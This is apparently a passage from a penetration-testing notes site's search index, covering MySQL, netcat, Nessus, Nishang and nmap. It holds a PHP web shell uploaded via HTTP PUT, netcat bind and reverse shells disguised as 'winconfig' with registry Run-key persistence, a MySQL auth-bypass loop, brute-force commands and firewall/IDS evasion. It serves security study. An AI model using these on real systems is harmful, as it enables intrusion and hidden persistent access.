                        # Show databases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Dump columns from NameOfTable\nSELECT * FROM NameOfTable;\n# SELECT name, description FROM products WHERE id=9;\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE persona(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP COLUMN edad;\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-queries","title":"Basic queries","text":"
                        # Show all columns from table\nSELECT * FROM persona\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n\n# Sorting data by the edad column\nSELECT * FROM persona ORDER BY edad;\n\n# Retrieving the first record from the table\nSELECT * from persona order by edad limit 1;\n\n# Count the number of people stored in persona\nSELECT count(*) from persona;\n\n# Context: a wordpress database\n# Identify how many distinct authors have published a post in the blog\nSELECT DISTINCT(post_author) from wpdatabase.wp_posts;\n
                        # UNION Statement syntax\n#<SELECT statement> UNION <other SELECT statement>;\n# Both SELECT statements must return the same number of columns. Example:\nSELECT name, description FROM products WHERE id=9 UNION SELECT price, id FROM products;\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#enumeration-queries","title":"Enumeration queries","text":"
                        # Show current user\ncurrent_user()\nuser()\n\n# Show current database\ndatabase()\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#interact-with-mysql","title":"Interact with MySQL","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#from-linux","title":"From Linux","text":"
                        mysql -u username -pPassword123 -h $IP\n# -h host/ip\n# -u user. By default, mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\nmysql -u root -h <host/IP>\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#from-windows","title":"From Windows","text":"
                        mysql.exe -u username -pPassword123 -h $IP\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#gui-application","title":"GUI Application","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#server-management-studio-or-ssms","title":"Server Management Studio or SSMS","text":"

                        SQL Server Management Studio or SSMS

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#mysql-workbench","title":"MySQL Workbench","text":"

                        Download from: https://dev.mysql.com/downloads/workbench/.

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#dbeaver","title":"dbeaver","text":"

                        dbeaver\u00a0is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

                        To install\u00a0dbeaver\u00a0using a Debian package we can download the release .deb package from\u00a0https://github.com/dbeaver/dbeaver/releases\u00a0and execute the following command:

                        sudo dpkg -i dbeaver-<version>.deb\n\n# run dbeaver in a second plane\n dbeaver &\n
                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#well-know-vulnerabilities","title":"Well-know vulnerabilities","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#misconfigurations","title":"Misconfigurations","text":"

                        Anonymous access enabled.

                        ","tags":["database","relational database","SQL"]},{"location":"mysql/#vulnerabilities","title":"Vulnerabilities","text":"

                        MySQL 5.6.x servers: CVE-2012-2122, among others. It allowed us to bypass authentication by repeatedly using the same incorrect password for the given account, because of a flaw in the way MySQL handled authentication attempts: the return value of the password-hash comparison was cast incorrectly, so roughly 1 in 256 attempts would succeed regardless of the password supplied. By simply repeating the login attempt enough times, we can get in without knowing the password, even though the server does not otherwise indicate success or failure differently.
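
                        A minimal sketch of the classic loop used to trigger this bug (host and iteration count are assumptions):

                        for i in $(seq 1 1000); do mysql -u root --password=wrong -h $ip 2>/dev/null; done\n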

                        ","tags":["database","relational database","SQL"]},{"location":"mythic/","title":"Mythic C2 Framework","text":"

                        https://github.com/its-a-feature/Mythic

                        The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

                        ","tags":["payloads","tools"]},{"location":"nessus/","title":"Nessus","text":"

                        Nessus has a client and a server. We use the client to configure the scans and the server to actually perform the scanning processes and report back the result to the client.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#installation","title":"Installation","text":"

                        Download .deb from: https://www.tenable.com/downloads/nessus

                        sudo dpkg -i Nessus-10.3.0-debian9_amd64.deb\nservice nessusd start\n

                        Now you can go to https://localhost:8834

                        Once Nessus Essentials is installed, register on the website to generate an API key.

                        Nessus gives us the option to create scan policies. Essentially these are customized scans that allow us to define specific scan options, save the policy configuration, and have them available to us under Scan Templates when creating a new scan.

                        This gives us the ability to create targeted scans for any number of scenarios, such as a slower, more evasive scan, a web-focused scan, or a scan for a particular client using one or several sets of credentials.

                        To exclude false positives from scan results, under the Resources section we can select Plugin Rules. In the new plugin rule, we input the host to be excluded, along with the Plugin ID for Microsoft DirectAccess, for instance.

                        Nessus gives us the option to export scan results in a variety of report formats, as well as the option to export raw Nessus scan results to be imported into other tools, archived, or passed to tools such as EyeWitness. Nessus can export scans into two formats: Nessus (scan.nessus) or Nessus DB (scan.db). The .nessus file is an XML file and includes a copy of the scan settings and plugin outputs. The .db file contains the .nessus file, the scan's KB, the plugin Audit Trail, and any scan attachments.

                        Scripts such as the nessus-report-downloader can be used to quickly download scan results in all available formats from the CLI using the Nessus REST API:

                        ./nessus_downloader.rb \n
                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#mitigating-issues","title":"Mitigating Issues","text":"

                        1. Some firewalls will cause us to receive scan results showing either all ports open or no ports open. If this happens, a quick fix is often to configure an Advanced Scan and disable the Ping the remote host option.

                        2. Adjust Performance Options and modify Max Concurrent Checks Per Host if the target host is often under heavy load, such as a widely used web application.

                        3. Unless specifically requested, we should never perform Denial of Service checks. The \"safe checks\" setting prevents Nessus from running plugins within its library of vulnerability checks that Tenable feels can have negative effects on the network, device, or application being tested.

                        4. It is also essential to keep in mind the potential impact of vulnerability scanning on a network, especially on low bandwidth or congested links. This can be measured using vnstat:
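
                        For instance, watching live traffic on the scanning interface (assuming the scan traffic leaves via eth0):

                        # Live bandwidth monitor on the interface used for the scan\nvnstat -l -i eth0\n\n# Hourly/daily totals for the same interface\nvnstat -i eth0\n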

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"netbios/","title":"NetBIOS - Network Basic Input Output System","text":"

                        NetBIOS stands for Network Basic Input Output System. Basically, servers and clients use NetBIOS when viewing network shares on the local area network.

                        NetBIOS supplies the hostname, NetBIOS name, domain, and network shares when querying a computer. When an MS Windows machine browses a network, it uses NetBIOS:

                        • datagrams to list the shares and the machines (port 138 / UDP)
                        • names to find workgroups (port 137 / UDP)
                        • sessions to transmit data to and from a Windows share (port 139 / TCP)
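
                        A quick way to query this information from Linux, assuming the Samba client utilities and nbtscan are installed (a sketch):

                        # Query the NetBIOS name table of a single host\nnmblookup -A $ip\n\n# Scan a whole subnet for NetBIOS names\nnbtscan 192.168.1.0/24\n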
                        ","tags":["windows"]},{"location":"netbios/#create-a-network-share-in-a-windows-based-environment","title":"Create a network share in a Windows based environment:","text":"
                        1. Turn on the File and Printer Sharing service.
                        2. Choose directories to share
                        UNC paths (Universal Naming Convention paths) \\\\Servername\\ShareName\\file.nat\n\n\\\\ComputerName\\C$\n\n\\\\ComputerName\\admin$\n\n\\\\ComputerName\\ipc$\u00a0 \u00a0 \u00a0 //inter process communication\n
                        ","tags":["windows"]},{"location":"netcat/","title":"netcat","text":"","tags":["http"]},{"location":"netcat/#installation","title":"Installation","text":"

                        Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. It comes preinstalled in Kali.

                        For windows: https://nmap.org/ncat/.

                        For linux:

                        sudo apt install ncat\n
                        ","tags":["http"]},{"location":"netcat/#usage","title":"Usage","text":"

                        It can be used to interact with plain-text services such as HTTP:

                        nc $ip <port> -flags\n
                        ","tags":["http"]},{"location":"netcat/#fingerprinting-with-netcat","title":"Fingerprinting with netcat","text":"
                        nc $ip 80\nHEAD / HTTP/1.0     \n# And hit RETURN twice\n

                        Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interrogate a service:

                         nc -nv $ip <PORT NUMBER>\n
                        ","tags":["http"]},{"location":"netcat/#netcat-commands","title":"Netcat commands","text":"","tags":["http"]},{"location":"netcat/#as-a-server","title":"As a server","text":"
                        nc -lvp 8888\n#-p: specify a port\n#-l: listen mode\n#-v: verbosity\n#-u: enforce a UDP connection\n#-e: execute the given command\n
                        ","tags":["http"]},{"location":"netcat/#as-a-client","title":"As a client","text":"
                        nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#transfer-data","title":"Transfer data","text":"

                        On the server side:

                        #data will be printed on screen\nnc -lvp <port>  \n

                        On the client side:

                        echo \u201chello\u201d | nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#transfer-data-and-save-it-in-a-file","title":"Transfer data and save it in a file","text":"

                        On the server side:

                        # Data will be stored in the received.txt file.\nnc -lvp <port> > received.txt\n

                        On the client side:

                        echo \u201chello\u201d | nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#transfer-file-and-save-it","title":"Transfer file and save it","text":"

                        On the server side:

                        # Received data will be stored in the received.txt file.\nnc -lvp <port> > received.txt\n

                        On the client side:

                        cat tobesentfile.txt | nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#netcat-shell","title":"Netcat shell","text":"

                        On the server side:

                        nc -lvp <port> -e /bin/bash\n

                        On the client side:

                        nc -v $ip <port>\n
                        ","tags":["http"]},{"location":"netcat/#some-enumeration-techniques-for-http-verbs","title":"Some enumeration techniques for HTTP verbs","text":"
                        # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n
                        ","tags":["http"]},{"location":"netcat/#some-exploitation-techniques-for-http-verbs","title":"Some exploitation techniques for HTTP verbs","text":"","tags":["http"]},{"location":"netcat/#delete-attack","title":"DELETE attack","text":"
                        # General syntax for removing a resource from server using netcat\nnc victim.site 80\nDELETE /path/to/resource.txt HTTP/1.0\n\n\n# Example for removing the login page of a site\nnc victim.site 80\nDELETE /login.php HTTP/1.0\n
                        ","tags":["http"]},{"location":"netcat/#put-attack-getting-a-shell","title":"PUT attack: getting a shell","text":"
                        # Save for instance a basic PHP shell in a file (shell.php):\n\n<?php\nif (isset($_GET['cmd']))\n{\n    $cmd = $_GET['cmd'];\n    echo '<pre>';\n    $result = shell_exec($cmd);\n    echo $result;\n    echo '</pre>';\n}\n?>\n\n\n# Count the size of the file\nwc -m shell.php\n\n# Send the HTTP verb message with netcat\nnc victim.site 80\nPUT /shell.php HTTP/1.0\nContent-Type: text/html\nContent-Length: [number you got with wc -m shell.php]\n\n\n# Run the exploit by typing in the browser:\nhttp://victim.site/shell.php?cmd=cat+/etc/passwd\n
                        ","tags":["http"]},{"location":"netcat/#backdoors-with-netcat","title":"Backdoors with netcat","text":"","tags":["http"]},{"location":"netcat/#the-attacker-initiates-the-connection","title":"The attacker initiates the connection","text":"

                        On the victim machine (if Windows): get the ncat.exe executable, rename it to something inconspicuous such as winconfig, and run from the command line:

                        winconfig -l -p <port> -e cmd.exe\n# Example: winconfig -l -p 5555 -e cmd.exe\n

                        On the attacker machine:

                        ncat <victim IP address> <port specified>\n# Example: ncat 192.168.0.40 5555\n
                        ","tags":["http"]},{"location":"netcat/#the-victim-initiates-the-connection","title":"The victim initiates the connection","text":"

                        Great for avoiding firewalls, since the victim initiates the outbound connection!

                        On the victim machine (if Windows): get the ncat.exe executable, rename it to something inconspicuous such as winconfig, and run from the command line:

                        winconfig -e cmd.exe <attacker IP> <port>\n# Example: winconfig -e cmd.exe 192.168.1.40 5555\n
                        On the attacker machine:

                        ncat -l -p <port> -v\n# Example: ncat -l -p 5555 -v\n
                        ","tags":["http"]},{"location":"netcat/#creating-a-registry-in-regedit","title":"Creating a registry in regedit","text":"
                        • In regedit, go to Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
                        • Right-Button > New > String value
                        • We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry entry winconfig)
                        • We edit the registry and we add the path to the executable file and some commands in the Value data:
                        \"C:\\Windows\\System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\"\n# For instance: \"C:\\Windows\\System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\"\n
                        ","tags":["http"]},{"location":"netcraft/","title":"netcraft","text":"

                        Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used.

                        Sometimes we can spot the actual IP address of the webserver from before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration still permits it.

                        See Information Gathering phase in a Security assessment.

                        ","tags":["web","pentesting","reconnaissance"]},{"location":"netdiscover/","title":"netdiscover - A network enumeration tool based on ARP request","text":"

                        Netdiscover is another discovery tool, included in Kali Linux 2018.2. It performs reconnaissance and discovery on both wireless and switched networks using ARP requests.

                        What is cool about netdiscover? While nmap is the best-suited tool for almost everything, netdiscover provides a quick way to find internal IP addresses and MAC addresses. That is the difference: netdiscover works only on internal networks.

                        ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#installation","title":"Installation","text":"

                        Sometimes, you may be given an outdated Kali OVA without netdiscover installed. To install it:

                        sudo apt-get install netdiscover\n
                        ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#basic-commands","title":"Basic commands","text":"
                        # Get help\nnetdiscover -h\n\n# Get all host in an interface and in a range\n# -i: interface\n# -r: range\nnetdiscover -i eth0 -r 192.168.5.42/24 \n
                        ","tags":["reconnaissance","pentesting"]},{"location":"network-traffic-capture/","title":"Network traffic capture tools","text":"","tags":["pentesting","network","toolS"]},{"location":"network-traffic-capture/#some-proxy-tools","title":"Some proxy tools","text":"
                        • Wireshark.
                        • Netmon (Microsoft Network Monitor).
                        • Fiddler: a web debugging proxy.
                        • BurpSuite.
                        • Echo Mirage: for thick clients; a freeware tool that hooks into an application's process and enables us to monitor its network interactions.
                        • Postman.
                        ","tags":["pentesting","network","toolS"]},{"location":"nikto/","title":"nikto","text":"

                        You will get some results related to headers such as, for example:

                        • The anti-clickjacking X-Frame-Options header is not present.
                        • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
                        • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

                        Run:

                        nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
                        ","tags":["web pentesting","reconnaissance","WSTG-INFO-02"]},{"location":"nishang/","title":"Nishang","text":"

                        Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

                        ","tags":["payloads","tools"]},{"location":"nishang/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/samratashok/nishang.

                        sudo apt install nishang\n
                        ","tags":["payloads","tools"]},{"location":"nishang/#antak-webshell","title":"Antak Webshell","text":"

                        Antak is a web shell written in ASP.NET which utilizes PowerShell. Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. Antak is included within the Nishang project.

                        The Antak files can be found in the /usr/share/nishang/Antak-WebShell directory.

                        When uploaded to an HTTP server on the victim machine, the Antak web shell functions like a PowerShell console. However, it executes each command as a new process. It can also execute scripts in memory and encode the commands you send.

                        Before uploading Antak, you will need to edit it to specify the user and password used to access the shell.
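
                        For example (a sketch; the antak.aspx file name matches the Nishang repository layout, and the destination path is arbitrary):

                        # Copy the shell to a working location before editing it\ncp /usr/share/nishang/Antak-WebShell/antak.aspx /tmp/upload.aspx\n# Edit /tmp/upload.aspx and set the user and password that protect the shell, then upload it\n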

                        ","tags":["payloads","tools"]},{"location":"nmap/","title":"nmap - A network exploration and security auditing tool","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#description","title":"Description","text":"

                        Network Mapper (Nmap) is a free and open-source tool for network exploration and security auditing, created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. It can also detect operating systems. These features are extensible through scripts that provide more advanced service detection.

                        nmap <scan types> <options> $ip\n
                        # commonly used\nnmap -sT -Pn --unprivileged --script banner $ip\n\n# enumerate ciphers supported by the application server\nnmap -sT -p 443 -Pn --unprivileged --script ssl-enum-ciphers $ip\n\n# SYN-scan the top 10,000 most well-known ports\nnmap -sS $ip --top-ports 10000\n

                        The --packet-trace option is worthwhile for understanding how packets are sent and received. Also, --reason displays the reason for a specific result.

                        Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interrogate a service:

                         nc -nv $ip <PORT NUMBER>\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#cheat-sheet","title":"Cheat Sheet","text":"

                        By default, Nmap will conduct a TCP scan unless specifically requested to perform a UDP scan.

                        nmap 10.0.2.1\nnmap 10.0.2.1/24\nnmap 10.0.2.1-254\nnmap 10.0.*.*\nnmap 10.0.2.1,3,17\nnmap 10.0.2,4.1,3,17\nnmap domain.com\nnmap 10.0.2.1 -p 3389\nnmap 10.0.2.1 -p 80,3389\nnmap 10.0.2.1 -p 50-90\nnmap 10.0.2.1 -p U:53, T:80\n\n# ***** Saving results ******\n# -----------------------------------------\n# -oN: Normal output with .nmap file extension\n# -oG: Grepable output with the .gnmap file extension\n# -oX: XML output with the .xml file extension\n# -oA: Save results in all formats\n# -oA target: Saves the results in all formats, starting the name of each file with 'target'.\nsudo nmap $ip -oA path/to/target\n\n\n# Forces full port enumeration; not limited to the top 1000 ports\nnmap $ip -p-\n\n# Disables port scanning. If we disable port scanning (`-sn`), Nmap automatically performs a ping scan with `ICMP Echo Requests` (`-PE`). Also called ping scan or ping sweep. More reliable than pinging the broadcast address, because hosts do not reply to broadcast queries.\nnmap -sn $ip\n\n# Disables DNS resolution.\nnmap -n $ip\n\n# Disables ARP ping.\nnmap $ip --disable-arp-ping\n\n# Skips the host discovery stage altogether. It deactivates the ICMP echo requests\nnmap -Pn $ip\n\n# Scans top 100 ports.\nnmap -F $ip\n\n# Shows the progress of the scan every 5 seconds.\nnmap $ip --stats-every=5s\n\n# To skip host discovery and port scan, while still allowing the Nmap Scripting Engine to run, we use -Pn -sn combined.\nnmap -Pn -sn $ip\n\n# OS detection\nnmap -O $ip\n\n# Limit OS detection to promising targets\nnmap -O $ip --osscan-limit\n\n# Guess OS more aggressively\nnmap -O $ip --osscan-guess\n\n# Version detection\nnmap -sV $ip\n\n# Intensity level goes from 0 to 9\nnmap -sV $ip --version-intensity 8\n\n# tcpwrapped means that the TCP handshake was completed,\n# but the remote host closed the connection without receiving any data.\n# This means that something is blocking connectivity with the target host.\n\n# OS detection + version detection + script scanning + traceroute\nnmap -A $ip\n\n# Half-open scanning. SYN + SYN ACK + RST\n# A well-configured IDS will still detect the scan\nnmap -sS $ip\n\n# TCP connect scan: SYN + SYN ACK + ACK + DATA (banner) + RST\n# This scan gets recorded in the application logs on the target systems\nnmap -sT $ip\n\n# Scan a list of hosts. One per line in the file\nnmap -sn -iL hosttoscanlist.txt\n\n# List targets to scan\nnmap -sL $ip\n\n# Full scanner\nnmap -sC -sV -p- $ip\n# The script scan `-sC` flag causes `Nmap` to report the server headers `http-server-header` and the page title `http-title` for any web page hosted on the webserver.\n\n\n# UDP quick\nnmap -sU -sV $ip\n\n# Called ACK scan. Returns whether the port is filtered or not. Useful to determine if there is a firewall.\nnmap -sA $ip\n\n# Sends an ACK packet. In the response we pay attention to the window size of the TCP header. If the window size is different from zero, the port is open. If it is zero, the port is either closed or filtered.\nnmap -sW $ip\n

                        To redirect results to a file, append > targetfile.txt to the command.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#search-and-run-a-script-in-nmap","title":"Search and run a script in nmap","text":"

                        NSE: Nmap Scripting Engine.

                        # All scripts are located under:\n/usr/share/nmap/scripts\n\n\nlocate -r nse$|grep <term>\n# if this doesn't work, update the db with:\nsudo updatedb\n\n\n# Also:\nlocate scripts/<nameOfservice>\n

                        Run a script:

                        # Run default scripts \nnmap $ip -sC\n\n# Run  scripts from a category. See categories below\nnmap $ip --script <category>\n\n# Run specific scripts\nnmap --script <script-name>,<script-name>,<script-name> -p<port> $ip\n

                        NSE (Nmap Script Engine) provides us with the possibility to create scripts in Lua for interaction with certain services. There are a total of 14 categories into which these scripts can be divided:

                        • auth: Determination of authentication credentials.
                        • broadcast: Scripts used for host discovery by broadcasting; the discovered hosts can be automatically added to the remaining scans.
                        • brute: Executes scripts that try to log in to the respective service by brute-forcing with credentials.
                        • default: Default scripts executed by using the -sC option. Syntax: sudo nmap $ip -sC
                        • discovery: Evaluation of accessible services.
                        • dos: These scripts check services for denial-of-service vulnerabilities; they are used less because they can harm the services.
                        • exploit: Tries to exploit known vulnerabilities for the scanned port.
                        • external: Scripts that use external services for further processing.
                        • fuzzer: Identifies vulnerabilities and unexpected packet handling by sending different fields, which can take much time.
                        • intrusive: Intrusive scripts that could negatively affect the target system.
                        • malware: Checks if some malware infects the target system.
                        • safe: Defensive scripts that do not perform intrusive or destructive access.
                        • version: Extension for service detection.
                        • vuln: Identification of specific vulnerabilities.","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#general-vulnerability-assessment","title":"General vulnerability assessment","text":"
                        sudo nmap $ip -p 80 -sV --script vuln \n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-21-footprinting-ftp","title":"Port 21: footprinting FTP","text":"
                        # Locate all FTP-related scripts\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scan: version detection, default scripts, and aggressive mode\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-22-attack-a-ssh-connection","title":"Port 22: attack a ssh connection","text":"
                        nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports-137-138-139-445-footprinting-smb","title":"Ports 137, 138, 139, 445: footprinting SMB","text":"
                        sudo nmap $ip -sV -sC -p139,445\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#grab-banners-of-services","title":"Grab banners of services","text":"
                        # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#enumerate-samba-service-smb","title":"Enumerate samba service (smb)","text":"
                        # 1. Search for existing scripts for smb enumeration\nlocate -r nse$|grep <term>\n\n# 2. Select smb-enum-shares and run it\nnmap --script=smb-enum-shares $ip\n\n# 3. Retrieve users\nnmap --script=smb-enum-users $ip\n\n# 4. Brute-force users and passwords\nnmap --script=smb-brute $ip\n\n# Interact with the SMB service to extract the reported operating system version\nnmap --script smb-os-discovery.nse -p445 $ip\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performance","title":"Performance","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#introducing-delays-or-timeouts","title":"Introducing delays or Timeouts","text":"

                        When Nmap sends a packet, it takes some time (the Round-Trip Time, RTT) to receive a response from the scanned port. Generally, Nmap starts with a high timeout (--min-rtt-timeout) of 100ms.

                        # While connecting to the service, we noticed that the connection took longer than usual (about 15 seconds). There are some services whose connection speed, or response time, can be configured. Now that we know that an FTP server is running on this port, we can deduce the origin of our \"failed\" scan. We could confirm this again by specifying the minimum `probe round trip time` (`--min-rtt-timeout`) in Nmap to 15 or 20 seconds and rerunning the scan.\nnmap $IP --min-rtt-timeout 15\n\n# Optimized RTT\nsudo nmap IP/24 -F --initial-rtt-timeout 50ms --max-rtt-timeout 100ms\n# -F: Scans top 100 ports.\n# --initial-rtt-timeout 50ms: Sets the specified time value as initial RTT timeout.\n# --max-rtt-timeout 100ms: Sets the specified time value as maximum RTT timeout.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#max-retries","title":"Max Retries","text":"

                        The default value for the retry rate is 10. If we set --max-retries to 0 and Nmap does not receive a response for a port, it will not send any more packets to that port, and the port will be skipped.

                        sudo nmap $ip/24 -F --max-retries 0\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#rates","title":"Rates","text":"

                        When setting the minimum rate (--min-rate) for sending packets, we tell Nmap to simultaneously send the specified number of packets.

                        sudo nmap $ip/24 -F --min-rate 300\n# --min-rate 300 Sets the minimum number of packets to be sent per second.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#timing","title":"Timing","text":"

                        Nmap offers six different timing templates (-T <0-5>), with -T 3 being the default:

                        • -T 0: Paranoid
                        • -T 1: Sneaky
                        • -T 2: Polite
                        • -T 3: Normal
                        • -T 4: Aggressive
                        • -T 5: Insane

                        More on nmap documentation.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#firewall-and-idsips-evasion-with-nmap","title":"Firewall and IDS/IPS Evasion with nmap","text":"

                        An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state.

                        1. An adversary sends TCP packets with the ACK flag set and a sequence number of zero (which means that are not associated with an existing connection to target ports).

                        2. An adversary uses the response from the target to determine the port's state.

                          • Filtered port: The target ignores and drops the packets; no response or ICMP error code is returned.
                          • Unfiltered port: The target rejects the packets and returns an RST flag plus different types of ICMP error codes (or none at all): Net Unreachable, Net Prohibited, Host Unreachable, Host Prohibited, Port Unreachable. If an RST packet is received, the target port is either closed or the ACK was sent out-of-sync.

                        Unlike outgoing connections, all connection attempts (with the SYN flag) from external networks are usually blocked by firewalls. However, the packets with the ACK flag are often passed by the firewall because the firewall cannot determine whether the connection was first established from the external network or the internal network.
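
                        A minimal sketch of such a scan against a handful of ports:

                        sudo nmap $ip -sA -p 21,22,25 -Pn -n --disable-arp-ping --packet-trace\n# 'unfiltered' ports answered with RST; 'filtered' ports were silently dropped by a firewall\n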

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#detect-a-waf","title":"Detect a WAF","text":"
                        nmap -p 80 --script http-waf-detect $ip\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#decoys","title":"Decoys","text":"

                        There are cases in which administrators block specific subnets from different regions in principle. Decoys can be used for SYN, ACK, ICMP scans, and OS detection scans.

                        With the Decoy scanning method (-D), Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent.

                        sudo nmap $ip -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5\n# -D RND:5  Generates five random IP addresses that indicates the source IP the connection comes from.\n

                        Manually specify a source IP address (-S) to reach services that are only accessible from individual subnets:

                        sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0\n# -n: Disables DNS resolution.\n# -Pn: Disables ICMP Echo requests.\n# -p 445: Scans only the specified ports.\n# -O: Performs operation system detection scan.\n# -S: Scans the target by using different source IP address.\n# -e tun0: Sends all requests through the specified interface.\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#dns-proxying","title":"DNS proxying","text":"

                        DNS queries are made over UDP port 53. TCP port 53 was previously only used for so-called \"zone transfers\" between DNS servers or for data transfers larger than 512 bytes. This is changing due to the IPv6 and DNSSEC expansions, which cause many DNS requests to be made via TCP port 53.

                        We can bypass a demilitarized zone (DMZ) by specifying DNS servers ourselves (we can use the company's DNS server): --dns-servers <ns>,<ns>

                        We can also use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through.

                        Example:

                        # Simple SYS-Scan of a filtered port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace\n# PORT      STATE    SERVICE\n# 50000/tcp filtered ibm-db2\n\n\n# SYN-Scan From DNS Port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53\n# PORT      STATE SERVICE\n# 50000/tcp open  ibm-db2\n

                        Following the example, a possible exploitation for this weak configuration would be:

                        nc -nv -p 53 $ip 50000\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#udp-scans-not-working-on-vpn-connections","title":"UDP scans not working on VPN connections","text":"

                        Explanation from https://www.reddit.com/r/nmap/comments/u08lud/havin_a_rough_go_of_trying_to_scan_a_subnet_with/:

